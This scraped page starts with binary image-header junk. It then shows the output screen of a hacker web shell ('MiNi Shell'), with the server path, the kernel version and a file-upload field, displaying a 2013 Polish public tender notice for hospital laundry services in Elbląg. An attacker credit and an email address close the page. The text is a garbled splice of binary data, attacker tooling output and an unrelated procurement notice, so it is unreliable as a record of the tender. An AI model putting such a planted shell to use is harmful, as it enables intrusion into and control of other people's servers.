JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130529/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130529/209712-N-2013.html

<p class="kh_header"><b>Elbląg: Usługi pralnicze</b><br>
<b>Numer ogłoszenia: 209712 - 2013; data zamieszczenia: 29.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Elbląski Szpital Specjalistyczny z Przychodnią Samodzielny Publiczny Zakład Opieki Zdrowotnej w Elblągu , ul. Komeńskiego 35, 82-300 Elbląg, woj. warmińsko-mazurskie, tel. 55 239 44 01, 55 239 44 95, faks 55 239 45 77.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpitalwojskowy.elblag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi pralnicze.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Średnia miesięczna ilość prania wynosi 7.000 kg
1.Usługi prania następującego asortymentu:
1)bielizny pościelowej (poszwy, poszewki, prześcieradła, podkłady płócienne, podkłady gumowe)
2)bielizny operacyjnej ( prześcieradła, podkłady , serwety)
3)odzież operacyjną ( bluzy, spodnie, fartuchy, sukienki)
4)bielizny pacjentów ( pidżamy, szlafroki, koszule nocne, podkoszulki)
5)uniformów oraz odzieży ochronnej i roboczej pracowników,
6)wyposażenia łóżek (koce, materace, poduszki, udogodnienia),
7)inne ( ręczniki, ścierki, obrusy, serwetki, pokrowce na materace) 
8)mopów, ścierek itp.
2.Usługa obejmuje:
1)moczenie, pranie, suszenie, maglowanie lub prasowanie, wykańczanie (uszlachetnianie), składanie oraz sortowanie ( według ustaleń z magazynierem Zamawiającego);
2)krochmalenie wyznaczonego asortymentu tj. obrusy, parawany, fartuchy płócienne;
3)dezynfekcja w komorze dezynfekcyjnej materacy, poduszek , a innego asortymentu na zlecenie Zamawiającego;
4)czyszczenie chemiczne;
5)naprawy krawieckie ( cerowanie, przyszywanie guzików, troczków, wszywanie zamków, wciąganie gum do spodni od pidżam, naprawa nap);
6)prasowanie garsonek, fartuchów, bluz, spodni ( na kant)odbiór asortymentu brudnego przez wykonawcę, załadunek i transport, rozładunek czystego asortymentu do magazynu czystej bielizny Zamawiającego na koszt Wykonawcy;
3.Wymagania i opis przedmiotu zamówienia:
1)Wykonawca zobowiązuje się do wykonania usługi prania asortymentu i jego dostarczenia w ciągu 24 godzin wraz z transportem. Usługa ma być wykonana przez co najmniej 5 dni w tygodniu od poniedziałku do piątku;
2)Wykonawca odbierze asortyment brudny z magazynu bielizny brudnej Zamawiającego raz dziennie od godz. 10.00 do godz. 11.00 w każdy dzień świadczonej usługi;
3)Wykonawca dostarczy czysty asortyment do magazynu czystej bielizny Zamawiającego w każdy dzień świadczonej usługi raz dziennie w godz. 6.00 - 7.00 Wykonawca dostarczy czysty asortyment w takiej samej ilości jaką odebrał z magazynu w dniu poprzednim;
4)Upoważniony przedstawiciel Wykonawcy dostarczający pranie jest zobowiązany  do oceny jakościowo - ilościowej czystego prania po dostarczeniu jej do siedziby Zamawiającego. Kontrola ta w obecności pracownika Zamawiającego odbywać się będzie każdorazowo. W przypadku braku zastrzeżeń kontrole ograniczą się do niezbędnego minimum;
5)w przypadku zwiększonej ilości dni wolnych od pracy, strony mogą uzgodnić termin wykonania usługi z trzydniowym wyprzedzeniem, celem zapewnienia ciągłości; 
6)w przypadku nie wywiązania się z terminów świadczonej usługi w zakresie odbioru brudnego i dostarczenia czystego asortymentu jak również niedostatecznej jakości i ilości pranego asortymentu, Zamawiający ma prawo do wnoszenia reklamacji na piśmie za pomocą faxu, e-mail, telefonicznie lub osobiście;
7)Wykonawca ma obowiązek natychmiastowej odpowiedzi na w/w reklamację w formie pisemnej; 
8)ważenie asortymentu brudnego odbywać się będzie u Zamawiającego w obecności upoważnionego pracownika Wykonawcy; 
9)Wykonawca zobowiązuje się do dysponowania oddzielnymi środkami transportu brudnej i czystej bielizny lub środkami transportu posiadającymi szczelną i podzieloną komorę załadunkową tak, aby bielizna czysta nie miała możliwości jakiegokolwiek kontaktu z bielizną brudną; 
10)Zamawiający wymaga, aby Wykonawca zapewnił dokumenty zdawczo - odbiorcze brudnej i czystej bielizny w ilości wynikającej z potrzeb ( druki samokopiujące, 3 egzemplarze, o treści wg załącznika nr 1 do umowy);
11)Wykonawca we własnym zakresie prowadził będzie drobne naprawy szwalniczo-krawieckie między innymi przyszywanie guzików, łat, cerowanie, zszywanie, naprawa zamków itp.. w ciągu 72 godzin. W przypadku nieprawidłowego wykonania naprawy Zamawiający zastrzega sobie ponowne oddanie asortymentu do naprawy i zwrócenie ponowne w ciągu 24 godzin;
12)Wykonawca powinien oddzielać rzeczy uszkodzone i naprawiać je tzn. przeszyć na maszynie szwem ciągłym, naprawić szwy boczne, zszyć rozdarte części bielizny, wszyć uszkodzony suwak, gumki, uzupełnić troki, napy, itp., ponosząc koszty potrzebnych materiałów;
13)W przypadku nie wywiązania się z usługi prania  w czasie 24 - godz. Wykonawca zobowiązuje się wydać zastępczo brakujący asortyment;
14)Terminy wykonania usług określone w niniejszym paragrafie obowiązują Wykonawcę niezależnie od rodzaju przeszkody uniemożliwiającej realizację usługi. W przypadku zaistnienia takiej przeszkody Wykonawca zobowiązany jest zastępczo, na koszt i ryzyko własne zlecić wykonanie usługi innemu wykonawcy oraz niezwłocznie poinformować Zamawiającego o przeszkodach uniemożliwiających wykonanie usługi;
15)Wykonawca nie może zlecać powierzonych mu zadań podwykonawcom;
16)Okresowo min. 1 X kwartał Zamawiający będzie dokonywał oceny usługi prania na formularzu F4142. Kopie protokołu otrzyma Wykonawca.
4.Do obowiązków Wykonawcy należy:
1)wykonanie usługi zgodnie z obowiązującymi przepisami;
2)zapewnienie w cenie usługi opakowań zapewniających bezpieczny transport bielizny np. worki płócienne kolor biały lub foliowe w kolorze czarnym i czerwonym, , oraz wózków jezdnych do umieszczania worków z brudną bielizną w wystarczającej ilości;
3)stosowanie oddzielnych środków transportu na brudny i czysty asortyment lub wyposażonych w hermetycznie zamykane kontenery ( inne pojemniki szczelnie zamknięte) zabezpieczającej oddzielenie asortymentu czystego i brudnego w środku transportu;
4)dostarczenie ubrań roboczych personelu na wieszakach, zabezpieczonych pokrowcami ochronnymi z folii; 
5)stosowanie profesjonalnych środków piorących i dezynfekcyjnych ( które powinny posiadać wymagane atesty i certyfikaty), gwarantujących właściwą jakość prania i nie powodujących przyspieszonego zużycia asortymentu, zapewniających odpowiedni poziom bieli, trwałości koloru, wytrzymałości asortymentu na rozciąganie, odpowiednich walorów użytkowych; 
6)Wykonawca ponosi odpowiedzialność za utratę lub uszkodzenie rzeczy będących przedmiotem usługi i zobowiązuje się do odkupienia zniszczonego lub zaginionego asortymentu w ciągu 5 dni od daty protokołu zdawczo - odbiorczego, w którym został ujawniony brak lub uszkodzenie asortymentu; 
7)ponoszenie pełnej odpowiedzialności za właściwą i terminową realizację usługi pralniczej i transportu bielizny wobec Zamawiającego i organów kontroli; 
8)odpowiedzialność za czystość mikrobiologiczną pranej bielizny;
9)stosowanie odpowiednich standardów i procedur higienicznych podczas prania i transportu bielizny, w przypadku niedoprania, usługa zostanie wykonana powtórnie na koszt Wykonawcy nie później niż w ciągu dwóch dni od momentu stwierdzenia w/w defektu; 
10)segregowanie asortymentu czystego wg. Rodzaju asortymentu w worki po uprzednim schłodzeniu i dostarczenie do magazynu bielizny czystej Zamawiającego; 
11)segregacja ma polegać na tym, że każdy rodzaj przedmiotu ma być pakowany wg asortymentu;
12)ścisłe przestrzeganie godzin odbioru brudnego i dostawy czystego asortymentu  okresowo raz na kwartał, w terminie do 30 dnia każdego ostatniego miesiąca kwartału, dostarczenie kierownikowi Działu Utrzymania Czystości Zamawiającego wyników (kserokopii) badań mikrobiologicznych pranej bielizny;
13)Zamawiający zastrzega sobie prawo do kontroli mikrobiologicznej dostarczanej bielizny bezpośrednio po przywiezieniu z pralni, bez wcześniejszego powiadomienia Wykonawcy, lecz w obecności jego przedstawiciela na koszt Wykonawcy; 
14)Zamawiający zastrzega sobie prawo kontroli procesu prania, stosowanych środków piorących i dezynfekcyjnych oraz warunków transportu bielizny;
15)Wykonawca raz na rok, na swój koszt, ma obowiązek dostarczyć Zamawiającemu kopie badań skuteczności procesu dezynfekcji komory dezynfekcyjnej wykonanej przez Stację Sanitarno- Epidemiologiczną.
5.Wymagania dotyczące technologii prania:
Pralnia, w której będą świadczone usługi powinna spełniać wysoką jakość, zapewniającą pełne przestrzeganie przepisów sanitarnych i epidemiologicznych. Pomieszczenia, w których będzie wykonywana usługa prania bielizny musi spełniać wymogi przepisów sanitarno-epidemiologicznych stosownie do prowadzenia tego typu działalności (prania bielizny szpitalnej). 
Pralnia piorąca bieliznę z zakładów opieki zdrowotnej powinna mieć opracowane szczegółowe procedury przyjmowania, transportu, dezynfekcji i prania, a także czyszczenia i dezynfekcji całego wyposażenia powierzchni, pomieszczeń pralni i higieny pracowników (dezynfekcja rąk, stosowanie środków ochrony osobistej, itp.).
Pralnia powinna mieć udokumentowane warunki procesu prania oraz dezynfekcji w komorze dezynfekcyjnej. Zamawiający wymaga dostarczenia aktualnego badania z poprawnej działalności komory dezynfekcyjnej nie starsze niż 60 dni.
Odpowiednie zapisy dotyczące kontroli jakości wody, stosowanych procesów pralniczych z dokładnym opisem warunków i stężeń oraz zakresem temperatury i czasu jej utrzymania powinny być każdorazowo umieszczane w książce kontroli i udostępniane na każde żądanie Zamawiającego.
Środki piorąco-dezynfekujące winny posiadać atesty oraz  dokumenty dopuszczające do obrotu zgodnie z obowiązującymi przepisami.
Wykonawca powinien przeprowadzać kontrolę mikrobiologiczną czystej bielizny, wysuszonej, przygotowanej do pakowania. Zamawiający wymaga aby Wykonawca jeden raz w kwartale przekazywał Zamawiającemu wyniki badań mikrobiologicznych.  
Zamawiający będzie miał prawo do przeprowadzania we własnym zakresie okresowych kontroli czystości mikrobiologicznej. 
Środki   piorąco-dezynfekujące  winny być dozowane automatycznie.
Wykonawca usługi powinien uwzględniać  w technologii prania wymogi producenta produktu (np. odzież operacyjna z dodatkiem włókna węglowego) w zakresie temperatury, środka chemicznego czy sposobu suszenia.
4.Wymagania sprzętowe:
- tunel pralniczy jako podstawowe urządzenie pralnicze
- komora do dezynfekcji kocy, kołder poduszek i materacy
- komputerowa stacja dozowania chemii pralniczej
- komora do dezynfekcji i mycia wózków transportowych
- wydzielone pralnice do prania bielizny operacyjnej
- tunel Finischera do serwisowania bielizny barierowej
- wózki transportowe z otwieraną jedną ścianą o wymiarach nie mniejszych niż 700x800x1800.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 98.31.00.00-9, 98.31.10.00-6, 98.31.50.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Kwota wadium wynosi: 11.000,00 zł
Wadium wnosi się przed upływem składania ofert. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy:PKO BP S. A.  o/Elbląg
NR KONTA: 10 1020 1752 0000 0502 0163 4666 do  dnia 12.06.2013r. do godz. 10:00
Za termin wniesienia wadium uważa się dzień wpływu środków na konto Zamawiającego lub złożenie oryginału gwarancji lub poręczeniach na ręce Zamawiającego.
2. Wadium może być wnoszone w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych lub poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158, z późn. zm.).
3. Gwarancje bankowe i ubezpieczeniowe mają być udzielane do końca terminu związania ofertą oraz odpowiadać warunkom formalnym wymaganym dla danej formy wadium przez Ustawę Prawo zamówień publicznych oraz niniejszą SIWZ.
4. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 , nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1,lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn leżących po jego stronie.
5. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca , którego oferta została wybrana:
1)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2)nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.  
6.Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy którego oferta została wybrana jako najkorzystniejsza z zastrzeżeniem art. 46 ust. 4a</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu będzie dokonana przez Zamawiającego na zasadzie spełnia - nie spełnia.  W przypadku nie spełniania jakiegokolwiek warunku udziału w postępowaniu Wykonawca zostanie wykluczony z postępowania na podstawie art. 24 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca złoży oświadczenie, że posiada wiedzę i doświadczenie.
Wykaz co najmniej pięciu zrealizowanych usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane należycie na formularzu stanowiącym załącznik nr 7 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca złoży oświadczenie, że posiada potencjał techniczny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca złoży oświadczenie, że posiada osoby zdolne do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca złoży oświadczenie, że posiada zdolność ekonomiczną i finansową.
Opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia do kwoty wartości składanej w ofercie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)druk oferty - załącznik nr 1 do SIWZ;
b) parametry jakości - załącznik nr 2 do SIWZ;
c) projekt umowy - załącznik nr 5 do SIWZ;
d) formularz oceny usługi -  załącznik nr 6 do SIWZ;
e) wykaz stosowanych środków piorących i dezynfekcyjnych dla każdego asortymentu prania;
f) dokumenty niezbędne do spełnienia kryterium jakości (np. plan pralni z podziałem na odpowiednie strefy, certyfikaty, umowy lub plany dotyczące systemu zarządzania jakością);
g) Zamawiający ze względu na specyfikę zamówienia wymaga prawa własności do lokalu w którym będzie realizowana usługa lub w przypadku najmu umowy na co najmniej 24 miesięcy od ogłoszenia zamówienia;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Jakość świadczonych usług - 20</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalwojskowy.elblag.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego, Budynek Administracji, I piętro, pokój 106.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.06.2013 godzina 10:30, miejsce: Siedziba Zamawiającego, Budynek Administracji, I piętro, Kancelaria szpitala pokój 101.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com